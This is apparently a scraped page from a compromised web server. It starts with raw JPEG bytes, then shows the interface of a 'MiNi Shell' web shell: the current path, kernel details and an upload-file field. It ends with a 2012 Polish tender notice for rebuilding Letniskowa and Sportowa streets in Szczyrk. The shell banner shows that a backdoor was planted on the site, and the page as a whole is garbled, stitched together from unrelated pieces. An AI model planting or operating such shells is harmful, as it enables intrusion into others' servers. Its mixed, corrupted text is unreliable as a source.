JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120927/369294-N-2012.html

<p class="kh_header"><b>Szczyrk: Odbudowa ul. Letniskowej  wraz  z  przepustem  oraz odbudowa  skarpy drogi, nawierzchni  i chodnika  ul. Sportowej w Szczyrku</b><br>
<b>Numer ogłoszenia: 369294 - 2012; data zamieszczenia: 27.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Szczyrku , ul. Beskidzka 4, 43-370 Szczyrk, woj. śląskie, tel. 033 8295026, faks 033 8178763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.szczyrk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa ul. Letniskowej  wraz  z  przepustem  oraz odbudowa  skarpy drogi, nawierzchni  i chodnika  ul. Sportowej w Szczyrku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Odbudowę ul. Letniskowej  wraz  z  przepustem.
1.1 Opis stanu istniejącego .
Ulica  Letniskowa  jest  drogą  dojazdową  do  lokalnych  zabudowań.  Na  odbudowywanym  odcinku nawierzchnia wykonana jest z  żelbetowych płyt betonowych, posiada ona zmienną szerokość  od 2,20 m do 2,80 z lokalnym wypełnieniem betonem oraz obustronne pobocze o szerokości od 0,50  m  do  1,00  m.  Wzdłuż  przedmiotowej  ulicy  znajdują  się  rowy  oraz  ścieki  z  elementów  prefabrykowanych, których stan nie zapewnia prawidłowego odwodnienia. 
Stan  nawierzchni  (poklawiszowane  płyty,  ubytki  w  nawierzchni)  oraz  urządzeń odwadniających (zamulone, zarośnięte) zakwalifikowano jako zły.  Dodatkowo w rejonie przedmiotowej inwestycji występują napowietrzne sieci uzbrojenia terenu w postaci linii energetycznej oraz sieci telefonicznej. Sieci te są widoczne w terenie.
1.2  Podstawowe parametry techniczne inwestycji. 
Ulica Letniskowa  D1/2 . odc. od km 0+013 do km 0+100 
- Klasa drogi: D1/2, 
- Jezdnie: jedno-jezdniowa, dwupasmowa, dwukierunkowa
- Szerokość  jezdni: ok. 3,5 m 
- Nawierzchnia: beton  
- pobocza: nawierzchnia gruntowa  
Podstawowe dane przedmiotowej inwestycji: 
Długość  remontowanej ulicy: 87mb  


1.3 Rozwiązania sytuacyjne i wysokościowe .
Odbudowa  zakłada  rozbiórkę  starej  nawierzchni  i  w  jej  miejscu  wykonanie  nowej   z  płyt  ażurowych  typu  IOMB wraz  z  poboczami  z  kruszywa  łamanego  o  szerokości  0,50 m, przewidziano  również  wykonanie  drenażu  francuskiego,  odwodnienia  liniowego  w  postaci  korytek  górskich  oraz  muldowych.  Założono  również  odmulenie  istniejących  rowów  wraz  z  wycięciem  krzaków oraz umocnienie skarp  i dna rowu poprzez płyty  ażurowe i narzut kamienny. 
Szerokość drogi jest  równa  2,40  m  oraz  obustronne  pobocza  o  szerokości  minimum  0,50  m.  Konstrukcja  drogi  jest  trzywarstwowa.  Składa  się  z  podbudowy  pomocniczej  z  kruszywa  łamanego,  podsypki  piaskowej,  nawierzchni z płyt typu IOMB. 
a) konstrukcja jezdni: 
- 12,5 cm nawierzchnia z płyt żelbetowych typu IOMB 
- 3 cm podsypka piaskowa 
- 20 cm podbudowa pomocnicza mieszanka mineralna o uziarnieniu ciągłym 0/31,5 przy 
module odkształcenia wtórnego M>160MPa 
- grunt rodzimy 
1.4 Odwodnienie .
Odwodnienie powierzchniowe  jezdni  realizowane  jest przy pomocy  spadków  poprzecznych,  podłużnych  oraz  ścieków  z  elementów  prefabrykowanych,  natomiast  w  celu  przejęcia  wody gruntowej, zaprojektowano odwodnienie wgłębne w postaci drenu francuskiego.  
Woda  zostanie  sprowadzona  do  projektowanych  ścieków,  skąd  zostanie  przejęta  przez  kanalizację  deszczową lub odprowadzona do istniejących cieków wodnych.  

2. Odbudowa  skarpy drogi, nawierzchni i chodnika  ul. Sportowej w Szczyrku
2.1 Opis stanu istniejącego.
Zakres robót budowlanych obejmuje odcinek ul. Sportowej od skrzyżowania z ul. Beskidzką na długości 103m. Droga posiada przekrój uliczny. Cała nawierzchnia drogi jest w dostatecznym stanie technicznym, natomiast skarpa cieku  i nawierzchnia chodników nie nadaję się już do dalszej eksploatacji jest ona zdeformowana i posiada liczne ubytki i przełomy. W stanie istniejącym, w granicach opracowania, posiada ona jezdnie o szerokości około 4,5m o nawierzchni bitumicznej oraz obustronne chodniki o zmiennej szerokości 1,25-1,50m. Odwodnienie drogi i chodników realizowane jest powierzchniowo, a wody opadowe są odprowadzane do istniejącego wpustu deszczowego. W rejonie przedmiotowej inwestycji występują sieci podziemnego uzbrojenia  terenu tj. sieć wodociągowa, teletechniczna, gazowa, energetyczna i sanitarna.
2.2 Podstawowe parametry techniczne inwestycji.
Przeznaczeniem inwestycji jest wykonanie odbudowa skarpy drogi, nawierzchni  i chodnika przy ul. Sportowej w Szczyrku na długości 103mb, uszkodzonej podczas zalewów powodziowych w 2010r.
Podstawowe parametry techniczne inwestycji:
Ulica Sportowa D1/2 - odc. od km 0+000 do km 0+103
- Klasa drogi: D1/2,
- Jezdnie: jedno-jezdniowa, dwupasmowa, dwukierunkowa
- Szerokość jezdni: ok. 4,5 m
- Nawierzchnia: beton asfaltowy
- chodniki: płytki betonowe szer. 1,25-1,50m
Podstawowe dane przedmiotowej inwestycji:
Długość remontowanej ulicy: 103mb
Jako typowy przekrój poprzeczny dla ulicy Sportowej przewidziany został przekrój uliczny z obustronnymi chodnikami o zmiennej szerokości 1,25m - 1,50m. Projektowana niweleta drogi pozostanie bez zmian i będzie przebiegała na całej długości po stanie istniejącym. Spadek podłużny drogi pozostanie bez zmian w stosunku do stanu istniejącego.
a) konstrukcja chodników i zjazdów:
- warstwa ścieralna z kostki betonowej podwójne  T koloru szarego gr 8 cm,
- podsypka cementowo piaskowa gr. 3cm,
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie gr 20cm frakcji 0/63mm,

2.3  Rozwiązania sytuacyjne i wysokościowe .
W ramach prac budowlanych  planuje się odbudowę nawierzchni chodników, umocnienie skarpy wraz z zabezpieczeniem jej brzegów. Ukształtowanie sytuacyjne ul. Sportowej pozostaje zgodne ze stanem istniejącym. 
W przekroju poprzecznym droga będzie składała się z jezdni i obustronnych chodników. Na  odcinku drogi występuje jeden łuk poziomy o R=200m. Jako zabezpieczanie skarpy cieku przewiduje się barierę typu Olsztyńskiego zakotwioną w podłożu za pomocą fundamentu betonowego wykonanego na miejscu z betonu klasy C12/15. Dodatkowo należy wykonać odtworzenie umocnienia brzegów cieku w postaci bloków kamiennych układanych na zaprawie cementowej.
Wysokość odtworzenia należy dostosować do wysokości projektowanego chodnika tak aby mur z bloków kamiennych był poniżej obrzeża betonowego nie więcej jak 10cm.  W celu poprawy odwodnienia powierzchniowego i likwidacji zastoisk wody na końcowym odcinku opracowania projektuje się odwodnienie liniowe wykonane wg rys. nr 2 Plan sytuacyjny.

Jako typowy przekrój poprzeczny dla ulicy Sportowej przewidziany został przekrój uliczny z obustronnymi chodnikami o zmiennej szerokości 1,25m - 1,50m. Projektowana niweleta drogi pozostanie bez zmian i będzie przebiegała na całej długości po stanie istniejącym. Spadek podłużny drogi pozostanie bez zmian w stosunku do stanu istniejącego.
a) konstrukcja chodników i zjazdów:
- warstwa ścieralna z kostki betonowej podwójne T koloru szarego gr 8 cm;
- podsypka cementowo piaskowa gr. 3cm;
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie gr 20cm frakcji 0/63mm;

2.4 Odwodnienie .
W celu polepszenia spływu wód deszczowych odwodnienie drogi błędzie realizowane przez wyprofilowanie istniejących spadków poprzecznych oraz przy udziale istniejącego wpustu deszczowego do którego zostanie podłączone odwodnienie linowe.
Ze względu na spadek podłużny i poprzeczny ul. Sportowej należy zabudować odwodnienie liniowe.
Korytko Monoblok 200A jest elementem uniwersalnym dla układania korytek ze spadkiem własnym 3 %. Korytka są elementami żelbetowymi prefabrykowanymi, posiadającymi wewnątrz kanał w kształcie litery U o gładkiej powierzchni ścianek z betonu, co zapewnia wysoką  prędkość przepływu i odpływu zanieczyszczeń. Zadaniem kanału jest zbieranie wód opadowych i odprowadzenie ich do studzienki odpływowej. Zwieńczenie korytka to zakotwione w konstrukcji betonowej dwa kątowniki z wbudowanymi kotwami. Zamknięcie kanału następuje poprzez montaż rusztu  żeliwnego Monoblok 200 A o wymiarach 280 x 500 mm. Ruszt Monoblok 200 A klasy D 400 spełnia wymogi obciążeń dla ruchu ciężkiego.
Studzienka odpływowa Monoblok 200 stanowi dodatkowo rewizję  punktową do usuwania odkładających się  zanieczyszczeń. Studzienki odpływowe posiadają osadnik  i mają możliwość jednostronnego lub dwustronnego podłączenia do sieci kanalizacji deszczowej. Studzienka odpływowa Monoblok 200 A jest elementem żelbetowym prefabrykowanym. Zadaniem w/w studzienki jest odbiór ścieków deszczowych z odwodnienia liniowego, a dokładnie z koryta, a następnie odprowadzenie ścieków do kanalizacji deszczowej poprzez otwór boczny o średnicy od DN 160 do DN 300. Dodatkowym zadaniem studzienki jest gromadzenie zanieczyszczeń. Dane techniczne studzienki są następujące:
- długość 1000 mm
- wysokość 800 mm
- szerokość 500 mm
- ciężar 0,69 Mg
W trakcie wykonywania odwodnienia liniowego oraz krawężników należy zwrócić szczególną uwagę na uszczelnienie pomiędzy elementami korytka (krawężnikami) a istniejąca nawierzchnią.
Wszelkie szczeliny powstałe podczas wykonywania robót należy uszczelnić masami bitumicznymi na gorąco modyfikowanymi polimerami np. BIGUMA TL82

3. Organizacja ruchu.
Wykonawca jest zobowiązany do przedstawienia projektu tymczasowej organizacji ruchu i uzgodnienia go z właściwym zarządcą drogi i innymi niezbędnymi organami oraz Inwestorem. Ze względu na charakter drogi przewiduje się prowadzenie remontu obiektu pod ruchem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Posiadania wiedzy i doświadczenia  - w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał:
a)  co najmniej jedną robotę budowlaną  polegającą na budowie, przebudowie, remoncie drogi o nawierzchni z płyt drogowych,  lub  kostki betonowej bądź granitowej  wraz  z odwodnieniem o wartości minimum 190.000,00 zł brutto, z załączeniem dokumentu potwierdzającego, że robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dysponowania osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone:  
- osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia  do kierowania robotami budowlanymi w specjalności drogowej, bądź konstrukcyjno-budowlanej lub odpowiadającymi im uprawnieniami nadanymi na podstawie wcześniej obowiązujących przepisów  prawa, oraz co najmniej 5-letnie doświadczenie w pełnieniu funkcji kierownika budowy, w tym przy realizacji jednego zamówienia polegającego na budowie, przebudowie, remoncie drogi o nawierzchni  z płyt drogowych,  lub  kostki betonowej bądź granitowej  wraz z odwodnieniem  o wartości minimum 190.000,00 zł brutto .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W zakresie sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia udokumentują:  
a)wykaże dostęp do  środków finansowych niezbędnych na realizację zamówienia   określonych na kwotę co najmniej 150.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie w trybie art.22 Pzp. oraz  oświadczenie w związku z art. 26 ust.2b Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany umowy. 
1) Zmiana  przewidzianego w umowie terminu zakończenia robót w przypadku:  
a)  zmiany spowodowanej warunkami atmosferycznymi, w szczególności 
-  klęski żywiołowej ,
- warunków atmosferyczne uniemożliwiającymi prowadzenie robót budowlanych (potwierdzone wpisem inspektora nadzoru) 
b) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, lub terenowymi, w szczególności istnienie nie zinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych  lub urządzeń. 
c) wstrzymania robót przez  Zamawiającego,
d) konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót,
2) Zmiana sposobu realizacji robót  na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
- koniecznością realizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdy zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy .
- niedostępnością na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub w specyfikacji technicznej wykonania i odbioru robót  spowodowanych zaprzestaniem produkcji  lub wycofania z rynku tych materiałów i urządzeń    
2. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami .
- zmianą sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmiany zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.
- w następstwie wprowadzenia zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.szczyrk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szczyrku 
ul. Beskidzka 4
43-370 Szczyrk
Pok. 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2012 godzina 10:00, miejsce: Urząd Miejski w Szczyrku 
ul. Beskidzka 4
43-370 Szczyrk
Dziennik Podawczy nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
